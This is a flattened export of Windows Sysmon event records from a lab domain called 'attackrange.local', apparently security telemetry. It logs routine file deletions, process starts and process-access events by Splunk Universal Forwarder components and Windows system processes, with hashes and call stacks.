07:54:25.654{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9C9B541F52FBBEA5FE01F1B1BF7BDF3,SHA256=F15505030DA50280DCF49F6AC99EDC058BB64B4D95B0F920B579DA300FBE8A8C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4117584B0689AB6A4305AEAFC822FDD5,SHA256=5DFE4985E68D8A25FBA618A728D0312F7C61865462DB7D40FCDBE149B117A880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.294{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94713183BBF9410A95976DE230C19F5C,SHA256=B42E61D239A8CCAB8CDD4DF99C0A0546A4CC3F181B56AF65B4F715F7D6C9D150,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.982{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:26.714{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61233C6B777625FDC07455DFA842F275,SHA256=051B6F3738BDF0F103669D1E60D766A3D8766E166893F35AB9205184DAE5AE47,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.794{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02D50DC8FA70F3B974199583E4B9A234,SHA256=C0B835EE7AA65E433F7EC21BE31BF820195D88DBED800BD55271991FA005709F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.794{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9C9B541F52FBBEA5FE01F1B1BF7BDF3,SHA256=F15505030DA50280DCF49F6AC99EDC058BB64B4D95B0F920B579DA300FBE8A8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.357{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:26.357{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.357{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:26.357{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
